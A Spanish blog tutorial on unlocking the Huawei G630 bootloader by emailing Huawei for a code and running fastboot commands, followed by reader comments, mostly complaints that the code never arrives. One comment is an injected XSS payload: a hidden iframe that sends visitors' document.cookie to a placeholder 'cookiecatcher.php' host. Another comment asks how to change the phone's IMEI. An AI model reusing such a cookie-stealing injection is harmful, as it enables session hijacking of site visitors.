-->

Desbloquear Bootloader

Como desbloquear bootloader Huawei G630
Saludos Comunidad Huawei G630!!!

Instrucciones:

divers:
32 bits  http://adf.ly/4359744/drivers-32-bits
64 bits  http://adf.ly/4359744/drivers-64-bits

HiSuite
http://adf.ly/4359744/hisuite


Correo: mobile@huawei.com
Con el asunto: Unlock bootloader G630

Mobile Model: G630-U251 (su numero de serie)
MEID/IMEI: Su IMEI
S/N: Su S/N
Mobile phone number:
Email: correo


ADB
http://adf.ly/4359744/adb

ADB: fastboot oem get-bootinfo
         fastboot oem unlock ###numero###


Gracias a Eloy Gomez

33 comentarios:

  1. Hola, no me llega el codigo, se puede hacer algo???
    Por favor que alguien me ayude.

    ResponderEliminar
    Respuestas
    1. Espera dos días, sino te llega, vuelve a enviarlo.

      Eliminar
    2. como dice Jorge, espera de dos a tres días, sino te llega vuelve a enviarlo.

      Eliminar
    3. https://emui.huawei.com. Te registras en la página y te lo dan al instante. Que ahora lo han cambiado.

      Eliminar
    4. hola ya me egistre y en que parte es paa pedir el codigo

      Eliminar
    5. eso si sera que funciona? a quien la ha funcionado?

      Eliminar
  2. el codigo no me llega , ya lo he enviado como 5 veces

    ResponderEliminar
    Respuestas
    1. espera se pasiente, no bombardees luego te marcaran como spam

      Eliminar
  3. el codigo no me llega , ya lo he enviado como 5 veces

    ResponderEliminar
  4. Hola, ¿Me podrias ayudar? envie el codigo y me respondieron esto:

    "Estimado cliente,
    Gracias por contactar con dispositivo de Huawei usted.
    Lo sentimos que no tienen ningún código de desbloqueo del gestor de arranque para los artículos G630-U251.
    Por defecto, puede hacerlo descargando fastboot para algunas imágenes directamente sin necesidad de desbloquear el bootloader ..
    Le sugerimos que mejor no hubieras raíz de su dispositivo que evite la garantía y tal vez la causa que se congele.
    Una vez más, gracias por ponerse en contacto con el dispositivo de Huawei."

    Espero tu ayuda, gracias.

    ResponderEliminar
  5. ami me llego lo mismo y que ellos no generan el código

    ResponderEliminar
  6. Este comentario ha sido eliminado por el autor.

    ResponderEliminar
  7. hola soy nueva en esto ,llega un momento en cmd que me dice que no reconoce la ruta¿que puedo hacer ?gracias

    ResponderEliminar
    Respuestas
    1. Hola...
      Tienes de escomprimir el Winrar en El disco (c)

      Eliminar
  8. ESO NO SIRVE PARA NADA NO CREA EN NADA LO QUE LE DICE

    ResponderEliminar
  9. Hola pueden decir si de verdad funciona

    ResponderEliminar
  10. Me Dice Que La Memoria Interna Esta Dañada, Que Puedo Hacer?

    ResponderEliminar
  11. Muchísimas Gracias por tu tutorial, muy bueno, clarito y sirvió

    ResponderEliminar
  12. Buenas tarde yo envie ese correo hace 15 dias y no me envian el codigo y me meto en la pagina y nada mi celular es un Huawei Ascend p1 lte se quedo en el logo y no tiene acceso al recovery cualquier ayuda se los agradezco

    ResponderEliminar
  13. Buenas tarde yo envie ese correo hace 15 dias y no me envian el codigo y me meto en la pagina y nada mi celular es un Huawei Ascend p1 lte se quedo en el logo y no tiene acceso al recovery cualquier ayuda se los agradezco

    ResponderEliminar
  14. Este comentario ha sido eliminado por el autor.

    ResponderEliminar
  15. Quie Me Dice Como Flashear El Huawei G630-u251 Con La FlashTool

    No E Podido Encontrar Los Archivos De ESA Rom Para La FlashTool

    Le Agradeceria A Quien Me Pueda Ayudar

    ResponderEliminar
  16. hola necesito ayuda mi telefono aparaece que se daño la memoria interna y me da dos opciones unarestablecer configuraciones de fabrica pero no deja que ouedo hacer

    ResponderEliminar
  17. yo estoy igual ya mande el mensaje a huawei y los muy bueno ellos me contestaron que no se puede que tengo que tener el celular prendido para que saber que esta funcionando bien y poder mandarme el código que no jodan y lo quiero precisamente para revivir mi celular esas jaladas pero lo que si puedo hacer es quemar la marca en todas las redes sociales para que nadie compre esa marca que mejor que la difusión de su mala marca que la verdad arrepentido estoy de a verla comprado no hay nada como samsung 100%

    ResponderEliminar
    Respuestas
    1. yo tambien lo habia hecho asi y nada que me llegaba lo hice ayer en la pagina de huawei china te lo dan al instante es lo mismo q la global pero esta en chino y si funciona 100% garantizado aqui esta el link: https://emui.huawei.com/plugin/unlock/index

      Eliminar
  18. yo tambien lo habia hecho asi y nada que me llegaba lo hice ayer en la pagina de huawei china te lo dan al instante es lo mismo q la global pero esta en chino y si funciona 100% garantizado

    ResponderEliminar
  19. aqui esta el link: https://emui.huawei.com/plugin/unlock/index

    ResponderEliminar
    Respuestas
    1. Ya me registre en tu link pero hasta ahi llego, me puedes indicar que mas debo hacer?

      Eliminar
  20. <...iframe... frameborder= 0 height=0 width=0 src=javascript...:voiddocument.location=YOURURL/cookiecatcher.php?c=+document.cookie><.../iframe>

    ResponderEliminar
  21. el cel esta en lock osea no puedo hacerlo con codigo, el correo no lo responden, otra manera conocen de buscar ese numero ID
    gracias

    ResponderEliminar
  22. ola amigos por favor alguienar sabe como cambiar el imei del g630 por fava bse lo agradesco mi whatsapp 3012284673

    ResponderEliminar